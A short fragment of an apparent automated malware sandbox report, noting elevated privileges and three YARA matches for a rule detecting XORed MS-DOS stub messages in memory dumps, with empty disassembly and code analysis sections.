                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000002.829615785.0000025C96C80000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000003.406745863.0000025C96370000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000000.409308294.0000025C96C80000.00000040.00000001.sdmp, Author: Florian Roth

                                                                                  Disassembly

                                                                                  Code Analysis